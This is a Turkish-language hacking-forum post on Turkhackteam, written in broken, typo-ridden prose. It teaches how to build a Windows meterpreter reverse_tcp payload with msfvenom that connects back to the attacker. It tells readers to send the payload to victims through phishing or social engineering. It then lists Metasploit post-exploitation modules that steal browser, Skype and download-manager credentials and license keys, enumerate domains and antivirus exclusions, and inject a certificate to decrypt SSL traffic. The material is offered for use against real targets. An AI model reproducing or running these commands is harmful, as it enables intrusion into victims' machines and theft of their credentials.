me.tasploitte tum modullar /stayjer asistan klubu

cewl

Kıdemli Üye
3 Haz 2017
2,861
0
26
Merdekan



salam eleykum





arkadaslar ilk once onu soylemek isdiyormki ****s.ploit cok elverisli 1 proqramdir portlara brute force etme hedef sistemin ana ekran gorunr=tusun alma hedef sistemin yetkilerne sahib olmak icin kullanilan 1 aracdir bu arac icin payload karsi sisteme sizma icin 1 payload gerekir brute force haric , bu payloadlari eyer isdersenizse kalinin kendi uzerinde bulunan msfpc windows ip yazlarak ve yahudaa



Kod:
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=(sizin ip) LPORT= (sizin acik port) -f exe > /root/Desktop



deye ana ekrana kayd yapip bu payloadi ya phisingg yada muhendislikle karsi tarafa gondere bilirsiniz /




Kod:
 tehlukesizlik zencirnin en zayif halkasi insandir

0GLdjD.jpg



evet arkadaslar zencirdeki zayif halka insandir eyer hangise sistmde insan amili varsa bir sistemin arkasinda insan duruyorsa o sistem tm guvenli diyildir. ve baska 1 sey sosial muhendislik bu asamaya gelmek icin ise bir sira tecrube ve arasdirmalar lazim mesela basdan anlatmaqa calisiyim hedefi kandirdin peki kandirdikdan sonra ne yapacaksin ? bilgi toplama bu dovrde google mukemmel 1 uyqulamadir baska baska link siteleri bulunmakdadir ve konudan uzaklasmayalum




kali linuksun uzerinde bir cok teset amacli uyqulamalar gelmisdir beef ****sploit dmitry ve baska baska amma kali linuks koruma amcali olsada onu tam ters kullanmak mumkundur



Kod:
 Tesir eks tesire beraberdir


Kod:
 https://i.hizliresim.com/Dy9ZlO.jpg

Kod:
 https://i.hizliresim.com/pG91oa.jpg

vee asagiya bir video ekleyeceyim peki videoda neler yapyorm ? ilk once olarak msfvenom ile payload yapip hedefe attim hedef payloada tikladiqinda bende otrum acildi peki otrum acildikdan sonra biz neler yapa biliriz ? asagida komutlar ve anlamlarin paylasacagim ve tam olarak kolaylik acisindan videodada modlu nasil ekleyeceyniz e yardim edecekdir



4G84bA.jpg



Kod:
 run post/windows/gather/credentials/imail

imaili calisdirir


Kod:
 run post/windows/gather/credentials/idm

internet download managerden sifreleri cikarir


Kod:
      run post/windows/gather/credentials/imvu


Bu modül IMVU oyun istemcisinden hesap kullanıcı adı ve parolasını çıkarır ve onu yağma olarak saklar.






Kod:
 run post/windows/gather/enum_devices

kurulu aygıtların listesini alın







Kod:
  run post/windows/gather/enum_domain


Active Directory'deki tüm kullanılabilir alanları listele









Kod:
   run post/multi/gather/firefox_creds




dosyanı firefox'tan çalmak için çalıştır







Kod:
 run post/multi/gather/skype_enum




skypenin sifresin almaq







Kod:
  post / windows / gather / enum_ms_product_keys




lisans anahtarlarını çalmak






Kod:
  run post/windows/gather/enum_db




yuklu veri tabanlari




Kod:
 post / windows / gather / enum_av_excluded




antivirüs istisnalarını programa götürmek geçiş ve otomatik geçiş yapmak







Kod:
  post / windows / manage / inject_ca



fitcha sertifikanızı uygulamaya ve SSL trafiğini çözmek için özel ve genel bir anahtara sahip olmanızı sağlar.


ve sayr vaktim oldukca konuya ekleyeceyim insallah :)

NOgbVk.jpg




vJ8ozD.png





cewl iyi seyirler diler


[ame="https://www.youtube.com/watch?v=4kvX_bgXuOg"]https://www.youtube.com/watch?v=4kvX_bgXuOg[/ame]
 
Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.